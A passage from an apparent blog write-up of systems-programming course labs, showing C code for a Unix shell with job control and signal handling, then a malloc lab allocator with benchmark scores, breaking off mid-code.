int jid; /* job ID [1, 2, ...] */
int state; /* UNDEF, BG, FG, or ST */
char cmdline[MAXLINE]; /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */

volatile pid_t fg_pid;
volatile sig_atomic_t fg_state = 1;
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char *cmdline);
int builtin_cmd(char **argv);
void do_kill(char **argv);
void do_bgfg(char **argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char *cmdline, char **argv);
void sigquit_handler(int sig);

void clearjob(struct job_t *job);
void initjobs(struct job_t *jobs);
int maxjid(struct job_t *jobs);
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline);
int deletejob(struct job_t *jobs, pid_t pid);
pid_t fgpid(struct job_t *jobs);
struct job_t *getjobpid(struct job_t *jobs, pid_t pid);
struct job_t *getjobjid(struct job_t *jobs, int jid);
int pid2jid(pid_t pid);
pid_t jid2pid(int jid);
void listjobs(struct job_t *jobs);
void list_cont_bgjob(struct job_t* job);
void list_terminated_fgjob(struct job_t* job);
void list_stopped_fgjob(struct job_t* job);

void usage(void);
void unix_error(char *msg);
void app_error(char *msg);
typedef void handler_t(int);
handler_t *Signal(int signum, handler_t *handler);

/*
* main - The shell's main routine
*/
int main(int argc, char **argv)
{
char c;
char cmdline[MAXLINE];
int emit_prompt = 1; /* emit prompt (default) */

/* Redirect stderr to stdout (so that driver will get all output
* on the pipe connected to stdout) */
dup2(1, 2);

/* Parse the command line */
while ((c = getopt(argc, argv, "hvp")) != EOF) {
switch (c) {
case 'h': /* print help message */
usage();
break;
case 'v': /* emit additional diagnostic info */
verbose = 1;
break;
case 'p': /* don't print a prompt */
emit_prompt = 0; /* handy for automatic testing */
break;
default:
usage();
}
}

/* Install the signal handlers */

/* These are the ones you will need to implement */
Signal(SIGINT, sigint_handler); /* ctrl-c */
Signal(SIGTSTP, sigtstp_handler); /* ctrl-z */
Signal(SIGCHLD, sigchld_handler); /* Terminated or stopped child */

/* This one provides a clean way to kill the shell */
Signal(SIGQUIT, sigquit_handler);

/* Initialize the job list */
initjobs(jobs);

/* Execute the shell's read/eval loop */
while (1) {
/* Read command line */
if (emit_prompt) {
printf("%s", prompt);
fflush(stdout);
}
if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
app_error("fgets error");
if (feof(stdin)) { /* End of file (ctrl-d) */
fflush(stdout);
exit(0);
}

/* Evaluate the command line */
eval(cmdline);
fflush(stdout);
fflush(stdout);
}

exit(0); /* control never reaches here */
}

/*
* eval - Evaluate the command line that the user has just typed in
*
* If the user has requested a built-in command (quit, jobs, bg or fg)
* then execute it immediately. Otherwise, fork a child process and
* run the job in the context of the child. If the job is running in
* the foreground, wait for it to terminate and then return. Note:
* each child process must have a unique process group ID so that our
* background children don't receive SIGINT (SIGTSTP) from the kernel
* when we type ctrl-c (ctrl-z) at the keyboard.
*/
void eval(char *cmdline)
{
fflush(stdout);
char* argv[MAXARGS]; // Argument list for execve()
char buf[MAXLINE]; // Holds modified command line
int bg; // Run in bg or fg
pid_t pid; // Process id

strcpy(buf, cmdline);
bg = parseline(buf, argv);
if (argv[0] == NULL)
return; // Ignore empty lines

sigset_t mask_all, mask, prev;
sigfillset (&mask_all);
sigemptyset (&mask);
sigaddset (&mask, SIGCHLD);

if (!builtin_cmd(argv)) {
sigprocmask (SIG_BLOCK, &mask, &prev);
if ((pid = fork()) == 0) {
sigprocmask (SIG_SETMASK, &prev, NULL);
setpgid (0, 0);
if (execve(argv[0], argv, environ) < 0) {
printf("%s: Command not found.\n", argv[0]);
exit(0);
}
}

sigprocmask (SIG_BLOCK, &mask_all, NULL);
int state = bg ? BG : FG;
addjob (jobs, pid, state, cmdline);
sigprocmask (SIG_SETMASK, &prev, NULL);

// Parent waits for fg job to terminate
if (!bg) {
waitfg (pid);
}
else {
list_cont_bgjob(getjobpid(jobs, pid));
}
}
return;
}

/*
* parseline - Parse the command line and build the argv array.
*
* Characters enclosed in single quotes are treated as a single
* argument. Return true if the user has requested a BG job, false if
* the user has requested a FG job.
*/
int parseline(const char *cmdline, char **argv)
{
static char array[MAXLINE]; /* holds local copy of command line */
char *buf = array; /* ptr that traverses command line */
char *delim; /* points to first space delimiter */
int argc; /* number of args */
int bg; /* background job? */

strcpy(buf, cmdline);
buf[strlen(buf)-1] = ' '; /* replace trailing '\n' with space */
while (*buf && (*buf == ' ')) /* ignore leading spaces */
buf++;

/* Build the argv list */
argc = 0;
if (*buf == '\'') {
buf++;
delim = strchr(buf, '\'');
}
else {
delim = strchr(buf, ' ');
}

while (delim) {
argv[argc++] = buf;
*delim = '\0';
buf = delim + 1;
while (*buf && (*buf == ' ')) /* ignore spaces */
buf++;

if (*buf == '\'') {
buf++;
delim = strchr(buf, '\'');
}
else {
delim = strchr(buf, ' ');
}
}
argv[argc] = NULL;

if (argc == 0) /* ignore blank line */
return 1;

/* should the job run in the background? */
if ((bg = (*argv[argc-1] == '&')) != 0) {
argv[--argc] = NULL;
}
return bg;
}

/*
* builtin_cmd - If the user has typed a built-in command then execute
* it immediately.
*/
int builtin_cmd(char **argv)
{
if (!strcmp(argv[0], "quit"))
exit(0);
if (!strcmp(argv[0], "jobs")) {
listjobs(jobs);
return 1;
}
if (!strcmp(argv[0], "fg")) {
do_bgfg(argv);
return 1;
}
if (!strcmp(argv[0], "kill")) {
do_kill(argv);
return 1;
}
if (!strcmp(argv[0], "bg")) {
do_bgfg(argv);
return 1;
}
if (!strcmp(argv[0], "&")) {
return 1;
}
return 0; /* not a builtin command */
}

void do_kill(char **argv)
{
pid_t pid = 0;
if (argv[1][0] == '%') {
int jid = atoi(argv[1] + 1);
pid = jid2pid(jid);
}
else {
pid = atoi(argv[1]);
}

kill (-pid, SIGKILL);
}

/*
* do_bgfg - Execute the builtin bg and fg commands
*/
void do_bgfg(char **argv)
{
if (argv[1] == NULL) {
if (!strcmp(argv[0], "fg")) {
printf("fg command requires PID or %%jobid argument\n");
}
else {
printf("bg command requires PID or %%jobid argument\n");
}
return;
}

pid_t pid = 0;
if (argv[1][0] == '%') {
int jid = atoi(argv[1] + 1);
if (jid == 0) {
if (!strcmp(argv[0], "fg")) {
printf("fg: argument must be a PID or %%jobid\n");
}
else{
printf("bg: argument must be a PID or %%jobid\n");
}
return;
}

pid = jid2pid(jid);
if (pid == 0) {
printf("%%%d: No such job\n", jid);
return;
}
}
else {
pid = atoi(argv[1]);
if (pid == 0) {
if (!strcmp(argv[0], "fg")) {
printf("fg: argument must be a PID or %%jobid\n");
}
else{
printf("bg: argument must be a PID or %%jobid\n");
}
return;
}
}

kill (-pid, SIGCONT);
struct job_t* job = getjobpid (jobs, pid);
if (job == NULL) {
printf("(%d): No such process\n", pid);
return;
}

if (!strcmp(argv[0], "fg")) {
job->state = FG;
waitfg(pid);
}
else {
job->state = BG;
list_cont_bgjob (job);
}
}

/*
* waitfg - Block until process pid is no longer the foreground process
*/
void waitfg(pid_t pid)
{
sigset_t mask;
sigemptyset (&mask);

fg_pid = pid;
fg_state = 0;
while (!fg_state) {
//sleep(1);
sigsuspend (&mask);
}
}

/*****************
* Signal handlers
*****************/

/*
* sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
* a child job terminates (becomes a zombie), or stops because it
* received a SIGSTOP or SIGTSTP signal. The handler reaps all
* available zombie children, but doesn't wait for any other
* currently running children to terminate.
*/
void sigchld_handler(int sig)
{
fflush(stdout);
int old_errno = errno;
sigset_t mask_all, prev;
pid_t pid;
int status;

sigfillset (&mask_all);
while ((pid = waitpid (-1, &status, WNOHANG | WUNTRACED)) > 0) {
sigprocmask (SIG_BLOCK, &mask_all, &prev);
if (pid == fg_pid) {
fg_state = pid;
}
// Child process is stopped
if (WIFSTOPPED(status)) {
struct job_t* job = getjobpid (jobs, pid);
job->state = ST;
printf("Job [%d] (%d) stopped by signal %d\n", job->jid, pid, WSTOPSIG(status));

}
// Child process is terminated
else if (WIFSIGNALED(status)) {
struct job_t* job = getjobpid (jobs, pid);
printf("Job [%d] (%d) terminated by signal %d\n", job->jid, pid, WTERMSIG(status));
deletejob(jobs, pid);
}
// Child process exits normally
else {
deletejob(jobs, pid);
}
sigprocmask (SIG_SETMASK, &prev, NULL);
}
errno = old_errno;
}

/*
* sigint_handler - The kernel sends a SIGINT to the shell whenver the
* user types ctrl-c at the keyboard. Catch it and send it along
* to the foreground job.
*/
void sigint_handler(int sig)
{
int old_errno = errno;
sigset_t mask_all, prev;

sigfillset (&mask_all);
sigprocmask (SIG_BLOCK, &mask_all, &prev);
if (!fg_state) {
kill (-fg_pid, SIGINT);
list_terminated_fgjob (getjobpid(jobs, fg_pid));
deletejob (jobs, fg_pid);
fg_state = 1;
}
sigprocmask (SIG_SETMASK, &prev, NULL);

errno = old_errno;
}

/*
* sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
* the user types ctrl-z at the keyboard. Catch it and suspend the
* foreground job by sending it a SIGTSTP.
*/
void sigtstp_handler(int sig)
{
int old_errno = errno;
sigset_t mask_all, prev;
sigfillset (&mask_all);
sigprocmask (SIG_BLOCK, &mask_all, &prev);
if (!fg_state) {
kill (-fg_pid, SIGTSTP);
struct job_t* job = getjobpid (jobs, fg_pid);
job->state = ST;
list_stopped_fgjob (job);
fg_state = 1;
}
sigprocmask (SIG_SETMASK, &prev, NULL);

errno = old_errno;
}

/*********************
* End signal handlers
*********************/

/***********************************************
* Helper routines that manipulate the job list
**********************************************/

/* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t *job) {
job->pid = 0;
job->jid = 0;
job->state = UNDEF;
job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t *jobs) {
int i;

for (i = 0; i < MAXJOBS; i++)
clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t *jobs)
{
int i, max=0;

for (i = 0; i < MAXJOBS; i++)
if (jobs[i].jid > max)
max = jobs[i].jid;
return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline)
{
int i;

if (pid < 1)
return 0;

for (i = 0; i < MAXJOBS; i++) {
if (jobs[i].pid == 0) {
jobs[i].pid = pid;
jobs[i].state = state;
jobs[i].jid = nextjid++;
if (nextjid > MAXJOBS)
nextjid = 1;
strcpy(jobs[i].cmdline, cmdline);
if(verbose){
printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
}
return 1;
}
}
printf("Tried to create too many jobs\n");
return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t *jobs, pid_t pid)
{
int i;

if (pid < 1)
return 0;

for (i = 0; i < MAXJOBS; i++) {
if (jobs[i].pid == pid) {
clearjob(&jobs[i]);
nextjid = maxjid(jobs)+1;
return 1;
}
}
return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t *jobs) {
int i;

for (i = 0; i < MAXJOBS; i++)
if (jobs[i].state == FG)
return jobs[i].pid;
return 0;
}

/* getjobpid - Find a job (by PID) on the job list */
struct job_t *getjobpid(struct job_t *jobs, pid_t pid) {
int i;

if (pid < 1)
return NULL;
for (i = 0; i < MAXJOBS; i++)
if (jobs[i].pid == pid)
return &jobs[i];
return NULL;
}

/* getjobjid - Find a job (by JID) on the job list */
struct job_t *getjobjid(struct job_t *jobs, int jid)
{
int i;

if (jid < 1)
return NULL;
for (i = 0; i < MAXJOBS; i++)
if (jobs[i].jid == jid)
return &jobs[i];
return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid)
{
int i;

if (pid < 1)
return 0;
for (i = 0; i < MAXJOBS; i++)
if (jobs[i].pid == pid) {
return jobs[i].jid;
}
return 0;
}

pid_t jid2pid(int jid)
{
int i;
if (jid < 1)
return 0;
for (i = 0; i < MAXJOBS; i++)
if (jobs[i].jid == jid) {
return jobs[i].pid;
}
return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t *jobs)
{
int i;

for (i = 0; i < MAXJOBS; i++) {
if (jobs[i].pid != 0) {
printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
switch (jobs[i].state) {
case BG:
printf("Running ");
break;
case FG:
printf("Foreground ");
break;
case ST:
printf("Stopped ");
break;
default:
printf("listjobs: Internal error: job[%d].state=%d ",
i, jobs[i].state);
}
printf("%s", jobs[i].cmdline);
}
}
}

void list_cont_bgjob(struct job_t* job)
{
printf("[%d] (%d) ", job->jid, job->pid);
printf("%s", job->cmdline);
}

void list_terminated_fgjob(struct job_t* job)
{
printf("Job [%d] (%d) terminated by signal 2\n", job->jid, job->pid);
}

void list_stopped_fgjob(struct job_t* job)
{
printf("Job [%d] (%d) stopped by signal 20\n", job->jid, job->pid);
}

/******************************
* end job list helper routines
******************************/


/***********************
* Other helper routines
***********************/

/*
* usage - print a help message
*/
void usage(void)
{
printf("Usage: shell [-hvp]\n");
printf(" -h print this message\n");
printf(" -v print additional diagnostic information\n");
printf(" -p do not emit a command prompt\n");
exit(1);
}

/*
* unix_error - unix-style error routine
*/
void unix_error(char *msg)
{
fprintf(stdout, "%s: %s\n", msg, strerror(errno));
exit(1);
}

/*
* app_error - application-style error routine
*/
void app_error(char *msg)
{
fprintf(stdout, "%s\n", msg);
exit(1);
}

/*
* Signal - wrapper for the sigaction function
*/
handler_t *Signal(int signum, handler_t *handler)
{
struct sigaction action, old_action;

action.sa_handler = handler;
sigemptyset(&action.sa_mask); /* block sigs of type being handled */
action.sa_flags = SA_RESTART; /* restart syscalls if possible */

if (sigaction(signum, &action, &old_action) < 0)
unix_error("Signal error");
return (old_action.sa_handler);
}

/*
* sigquit_handler - The driver program can gracefully terminate the
* child shell by sending it a SIGQUIT signal.
*/
void sigquit_handler(int sig)
{
printf("Terminating after receipt of SIGQUIT signal\n");
exit(1);
}

Lab 7: Malloc Lab

This lab needs us to implement your own allocator, which supports malloc, free and realloc. This lab might be the hardest one if you pursue a really high score.

Note that I used a relatively harder set of trace files here than the original set. Set your target at 95 scores and above if you'd like to challenge yourself. Oh, don't forget to add there trace files into your config.h:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#define DEFAULT_TRACEFILES \
"amptjp-bal.rep",\
"cccp-bal.rep",\
"cp-decl-bal.rep",\
"expr-bal.rep",\
"coalescing-bal.rep",\
"random-bal.rep",\
"random2-bal.rep",\
"binary-bal.rep",\
"binary2-bal.rep",\
"realloc-bal.rep",\
"realloc2-bal.rep",\
"boat.rep",\
"boat-plus.rep", \
"coalesce-big.rep", \
"exhaust.rep", \
"seglist.rep"

Naive Implicit

As a baseline, we first implement the implicit linked list version from the textbook without any optimization. Here is the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
/* Team name */
"Goodbye",
/* First member's full name */
"Sulley",
/* First member's email address */
"sulley@cs.cmu.edu",
/* Second member's full name (leave blank if none) */
"AnotherSulley",
/* Second member's email address (leave blank if none) */
"anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8
#define H_ALIGNMENT (ALIGNMENT/2)

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bit into a word */
#define PACK(size, alloc) ((size) | (alloc))

/* Read and write a double word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp) ((char *)(bp) - H_ALIGNMENT)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - ALIGNMENT)

/* Given block ptr bp, compute address of next and previous blocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - ALIGNMENT)))

static char* heap_listp;

static void* coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

if (prev_alloc && next_alloc) {
return bp;
}

else if (prev_alloc && !next_alloc) {
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
}

else if (!prev_alloc && next_alloc) {
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}

else {
size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(FTRP(NEXT_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}

return bp;
}


static void* find_fit_first_hit(size_t asize)
{
void* bp;

for (bp = heap_listp; GET_SIZE(HDRP(bp)) > 0; bp = NEXT_BLKP(bp)) {
if (!GET_ALLOC(HDRP(bp)) && (asize <= GET_SIZE(HDRP(bp)))) {
return bp;
}
}

return NULL;
}

static void* find_fit(size_t asize)
{
return find_fit_first_hit(asize);
}

static void place(void* bp, size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));

if ((csize - asize) >= 2 * ALIGNMENT) {
PUT(HDRP(bp), PACK(asize, 1));
PUT(FTRP(bp), PACK(asize, 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(csize - asize, 0));
PUT(FTRP(bp), PACK(csize - asize, 0));
}
else {
PUT(HDRP(bp), PACK(csize, 1));
PUT(FTRP(bp), PACK(csize, 1));
}
}

static void* extend_heap(size_t words)
{
char *bp;
size_t size;

size = (words % 2) ? (words + 1) * H_ALIGNMENT : words * H_ALIGNMENT;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;

PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));

return coalesce(bp);
}

/*
* mm_init - initialize the malloc package.
*/
int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * H_ALIGNMENT)) == (void *)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + 1 * H_ALIGNMENT, PACK(ALIGNMENT, 1));
PUT(heap_listp + 2 * H_ALIGNMENT, PACK(ALIGNMENT, 1));
PUT(heap_listp + 3 * H_ALIGNMENT, PACK(0, 1));
heap_listp += 2 * H_ALIGNMENT;

if (extend_heap(CHUNKSIZE / H_ALIGNMENT) == NULL)
return -1;
return 0;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/
void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size == 0)
return NULL;

if (size <= ALIGNMENT)
asize = 2 * ALIGNMENT;
else
asize = ALIGNMENT * ((size + ALIGNMENT + ALIGNMENT - 1) / ALIGNMENT);

if ((bp = find_fit(asize)) != NULL) {
place (bp, asize);
return bp;
}

extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / H_ALIGNMENT)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/
void mm_free(void *bp)
{
size_t size = GET_SIZE(HDRP(bp));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
coalesce(bp);
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/
void* mm_realloc(void* bp, size_t size)
{
if (bp == NULL)
return mm_malloc(size);

if (size == 0) {
mm_free(bp);
return NULL;
}

size_t osize = GET_SIZE(HDRP(bp)) - ALIGNMENT;
size_t asize = ALIGNMENT * ((size + ALIGNMENT - 1) / ALIGNMENT);

if (osize >= asize + 2 * ALIGNMENT) {
void* old_bp = bp;
PUT(HDRP(bp), PACK(asize + ALIGNMENT, 1));
PUT(FTRP(bp), PACK(asize + ALIGNMENT, 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(osize - asize, 0));
PUT(FTRP(bp), PACK(osize - asize, 0));

coalesce(bp);
return old_bp;
}
else if (osize >= asize) {
return bp;
}
else {
void* new_bp = mm_malloc(size);
if (new_bp == NULL)
return NULL;

memcpy(new_bp, bp, osize);
mm_free(bp);
return new_bp;
}
}

The naive version gets a score of... 54. Too bad isn't it?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
trace  valid  util     ops      secs  Kops
0 yes 99% 5694 0.004138 1376
1 yes 99% 5848 0.003870 1511
2 yes 99% 6648 0.006039 1101
3 yes 100% 5380 0.004667 1153
4 yes 66% 14400 0.000043338028
5 yes 91% 4800 0.004471 1073
6 yes 92% 4800 0.004170 1151
7 yes 55% 12000 0.062290 193
8 yes 51% 24000 0.208311 115
9 yes 27% 14401 0.027274 528
10 yes 30% 14401 0.000727 19817
11 yes 56% 57716 0.960618 60
12 yes 78% 100000 1.945745 51
13 yes 99% 20000 0.000753 26553
14 yes 71% 200400 0.107901 1857
15 yes 58% 6495 0.013861 469
Total 73% 496983 3.354877 148

Perf index = 44 (util) + 10 (thru) = 54/100

Implicit + Deferred Coalesce + No Footer

Our first trial to optimize the naive version is to add deferred coalesce and eliminate footers for allocated blocks.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
/* Team name */
"Goodbye",
/* First member's full name */
"Sulley",
/* First member's email address */
"sulley@cs.cmu.edu",
/* Second member's full name (leave blank if none) */
"AnotherSulley",
/* Second member's email address (leave blank if none) */
"anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, alloc_prev, alloc) ((size) | (alloc_prev) | (alloc))

/* Read and write a double word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define GET_ALLOC_PREV(p) (GET(p) & 0x2)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp) ((char *)(bp) - SWORD)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

static char* heap_listp;

static void* coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

if (prev_alloc && next_alloc) {
return bp;
}

else if (prev_alloc && !next_alloc) {
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(bp), PACK(size, 1 << 1, 0));
PUT(FTRP(bp), PACK(size, 1 << 1, 0));
}

else if (!prev_alloc && next_alloc) {
bp = PREV_BLKP(bp);
size += GET_SIZE(HDRP(bp));
PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
}

else {
size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(HDRP(NEXT_BLKP(bp)));
bp = PREV_BLKP(bp);
PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
}

return bp;
}


static void* find_fit_first_hit_deferred(size_t asize)
{
void* bp = heap_listp;
void* next;

while (GET_SIZE(HDRP(bp)) > 0) {
if (!GET_ALLOC(HDRP(bp))) {
if (asize <= GET_SIZE(HDRP(bp)))
return bp;
next = NEXT_BLKP(bp);
if (!GET_ALLOC(HDRP(next))) {
bp = coalesce(next);
continue;
}
}
bp = NEXT_BLKP(bp);
}

return NULL;
}

static void* find_fit_better_hit_deferred(size_t asize)
{
void* bp = heap_listp;
void* best_bp = NULL;
size_t best_size = 0;
const size_t iteration = 100;

while (GET_SIZE(HDRP(bp)) > 0) {
if (!GET_ALLOC(HDRP(bp))) {
if (!GET_ALLOC(HDRP(NEXT_BLKP(bp)))) {
bp = coalesce(NEXT_BLKP(bp));
continue;
}
if (asize <= GET_SIZE(HDRP(bp))) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
break;
}
}
bp = NEXT_BLKP(bp);
}

if (best_bp == NULL)
return NULL;

size_t i = 0;
while (i < iteration && GET_SIZE(HDRP(bp)) > 0) {
// Coalesce
while (!GET_ALLOC(HDRP(NEXT_BLKP(bp)))) {
bp = coalesce(NEXT_BLKP(bp));
continue;
}

// Check if it's better
++i;
if (!GET_ALLOC(HDRP(bp)) && asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
}

// Find next free block
bp = NEXT_BLKP(bp);
while (GET_ALLOC(HDRP(bp)) && GET_SIZE(HDRP(bp)) > 0)
bp = NEXT_BLKP(bp);
}

return best_bp;
}

static void* find_fit(size_t asize)
{
//void* bp = find_fit_first_hit_deferred(asize);
void* bp = find_fit_better_hit_deferred(asize);
return bp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}

static void place(void* bp, size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
if (csize >= asize + 2 * DWORD) {
PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(csize - asize, 1 << 1, 0));
PUT(FTRP(bp), PACK(csize - asize, 1 << 1, 0));
}
else {
PUT(HDRP(bp), PACK(csize, GET_ALLOC_PREV(HDRP(bp)), 1));
set_nextblock_alloc_prev(bp, 1 << 1);
}
}

static void* extend_heap(size_t words)
{
char *bp;
size_t size;

size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_alloc, 0));
PUT(FTRP(bp), PACK(size, prev_alloc, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 1));
return coalesce(bp);
}

/*
